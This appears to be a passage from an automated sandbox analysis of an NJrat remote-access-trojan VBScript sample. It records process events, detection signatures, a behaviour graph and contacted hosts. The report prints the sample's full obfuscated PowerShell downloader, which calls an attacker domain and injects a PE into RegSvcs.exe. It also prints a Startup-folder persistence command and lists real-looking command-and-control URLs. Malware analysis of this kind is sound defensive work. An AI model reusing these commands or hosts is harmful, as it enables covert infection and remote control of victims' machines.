?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B4CKBc?? ?? ?? oqHgIoG?? ?? ?? Ciqmcxk?? ?? ?? q?? ?? Q?? ?? BHMa?? ?? ?? Kg?? I?? ?? ?? RzGw?? ?? Co?? D?? ?? ?? Ecxw?? ?? ?? q?? B?? ?? ?? BCoufgE?? ?? ?? RvHQ?? ?? CioufgI?? ?? ?? RvHg?? ?? CioufgM?? ?? ?? RvHw?? ?? CioufgQ?? ?? ?? RvI?? ?? ?? CirGfgU?? ?? ?? QUKCE?? ?? ?? osHnIB?? ?? Bw0?? U?? ?? ?? IoIg?? ?? Cm8j?? ?? ?? KcyQ?? ?? ?? q?? BQ?? ?? BH4F?? ?? ?? EKhp+Bg?? ?? BCoe?? o?? G?? ?? ?? EKlZzD?? ?? ?? Bigl?? ?? ?? Kd?? Y?? ?? ?? K?? Bw?? ?? BCoe?? igm?? ?? ?? KKhp+Bw?? ?? BCoaK?? 0?? ?? ?? YqHgIoJw?? ?? Cio?? Ez?? H?? Lc?? ?? ?? ?? B?? ?? ?? Rcic?? ?? H?? Kcyg?? ?? ?? olKCk?? ?? ?? pvKg?? ?? CgYoKw?? ?? Cm8s?? ?? ?? KCwcoKw?? ?? CgsHcn8?? ?? HByhQ?? ?? cG8t?? ?? ?? KC3Mo?? ?? ?? K?? igr?? ?? ?? KKCw?? ?? ?? oMCCgr?? ?? ?? KDHKJ?? ?? BwKCs?? ?? ?? oNCXLP?? ?? BwKCs?? ?? ?? ooLg?? ?? Cg0oLw?? ?? CgcoM?? ?? ?? Cm8x?? ?? ?? Kcuc?? ?? HBvMg?? ?? CnIL?? Q Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BM?Eg?ZwBL?C??PQ?g?Cc?JQBN?Ek?UwBx?Eg?RwBL?Fo?TQBB?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?ZgB1?FU?Tg?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?Ew?S?Bn?Es?LgBy?GU?c?Bs?GE?YwBl?Cg?JwDmEEIgrC?n?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?GY?dQBV?E4?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?Gw?c?BP?FU?c?Bs?E0?c??u?FU?RwBs?Hk?bQB6?FU?Zw?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VQBE?HM?UwBp?EQ?YgBi?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?YQBz?GE?YwBX?EU?TgB0?GE?cgBK?E4?M??y?CU?N??2?D??Mg?l?GU?cwBh?GI?LwBh?HM?YQBj?D??Mg?l?Fc?RQBO?HQ?YQBy?Eo?Tg?v?G0?bwBj?C4?bwB1?GU?dQ?u?Hc?ZQBu?GE?cwBh?GM?d?Bh?HI?agBu?C8?Lw?6?H??d?B0?Gg?Jw?p?Ck?';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%MISqHGKZMA%','TVqQ?? ?? M?? ?? ?? ?? E?? ?? ?? ?? //8?? ?? Lg?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? 4fug4?? t?? nNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJ?? ?? ?? ?? ?? ?? ?? ?? ?? BQRQ?? ?? T?? ED?? OJNIpY?? ?? ?? ?? ?? ?? ?? ?? ?? ?? O?? ?? ?? iEL?? V?? ?? ?? Bw?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? jo?? ?? ?? ?? g?? ?? ?? ?? Q?? ?? ?? ?? ?? ?? ?? E?? ?? g?? ?? ?? ?? ?? g?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? ?? ?? ?? g?? ?? ?? ?? ?? ?? ?? ?? M?? YIU?? ?? B?? ?? ?? B?? ?? ?? ?? ?? ?? E?? ?? ?? E?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? K05?? ?? BP?? ?? ?? ?? ?? E?? ?? ?? JgD?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? G?? ?? ?? ?? w?? ?? ?? ?? MOQ?? ?? O?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? I?? ?? ?? C?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? CC?? ?? ?? Eg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C50ZXh0?? ?? ?? ?? CBo?? ?? ?? ?? g?? ?? ?? ?? H?? ?? ?? ?? ?? I?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? C?? ?? ?? G?? ucnNyYw?? ?? ?? JgD?? ?? ?? ?? Q?? ?? ?? ?? ?? Q?? ?? ?? ?? e?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B?? ?? ?? B?? LnJlbG9j?? ?? ?? M?? ?? ?? ?? ?? G?? ?? ?? ?? ?? C?? ?? ?? ?? Ig?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? Q?? ?? ?? Qg?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? DhOQ?? ?? ?? ?? ?? ?? ?? Eg?? ?? ?? ?? C?? ?? U?? nCI?? ?? LgV?? ?? ?? D?? ?? ?? ?? ?? ?? ?? ?? ?? FQ4?? ?? C4?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs') Jump to behavior
Source: RegSvcs.exe, 00000016.00000002.803703549.00000000032F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Njrat
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3016, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Njrat
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3016, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 575468 Sample: NJratccccassssG2.00.vbs Startdate: 21/02/2022 Architecture: WINDOWS Score: 100 58 Multi AV Scanner detection for domain / URL 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 13 other signatures 2->64 8 wscript.exe 1 2->8         started        11 wscript.exe 1 2->11         started        process3 signatures4 78 VBScript performs obfuscated calls to suspicious functions 8->78 80 Suspicious powershell command line found 8->80 82 Wscript starts Powershell (via cmd or directly) 8->82 13 cmd.exe 1 8->13         started        16 powershell.exe 8 8->16         started        84 Very long command line found 11->84 18 cmd.exe 1 11->18         started        20 powershell.exe 11->20         started        process5 signatures6 86 Wscript starts Powershell (via cmd or directly) 13->86 88 Uses ping.exe to sleep 13->88 90 Uses ping.exe to check the status of other devices and networks 13->90 22 powershell.exe 11 13->22         started        26 PING.EXE 1 13->26         started        29 conhost.exe 13->29         started        92 Suspicious powershell command line found 16->92 94 Obfuscated command line found 16->94 96 Very long command line found 16->96 31 powershell.exe 14 8 16->31         started        33 conhost.exe 16->33         started        35 powershell.exe 14 18->35         started        37 conhost.exe 18->37         started        39 PING.EXE 1 18->39         started        41 conhost.exe 20->41         started        process7 dnsIp8 46 C:\Users\user\AppData\Roaming\...\VFM.vbs, Little-endian 22->46 dropped 66 Suspicious powershell command line found 22->66 68 Obfuscated command line found 22->68 70 Very long command line found 22->70 72 Drops VBS files to the startup folder 22->72 48 127.0.0.1 unknown unknown 26->48 50 njratcasanew.ueuo.com 162.253.155.226, 49756, 80 REPRISE-HOSTINGUS United States 31->50 52 198.50.177.251, 49755, 80 OVHFR Canada 31->52 54 192.168.2.1 unknown unknown 31->54 74 Writes to foreign memory regions 31->74 76 Injects a PE file into a foreign processes 31->76 43 RegSvcs.exe 2 2 31->43         started        file9 signatures10 process11 dnsIp12 56 venomsi.mypsx.net 201.121.59.253, 81 UninetSAdeCVMX Mexico 43->56
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.50.177.251
 unknown Canada
16276 OVHFR false
201.121.59.253
 venomsi.mypsx.net Mexico
8151 UninetSAdeCVMX true
162.253.155.226
 njratcasanew.ueuo.com United States
62838 REPRISE-HOSTINGUS false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
njratcasanew.ueuo.com 162.253.155.226 true
venomsi.mypsx.net 201.121.59.253 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
venomsi.mypsx.net true
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://njratcasanew.ueuo.com/NJratNEW%20casa/base%2064%20NJratNEWcasa.txt false
    		high
    http://198.50.177.251/rump/4.txt true
    • Avira URL Cloud: malware
    		 unknown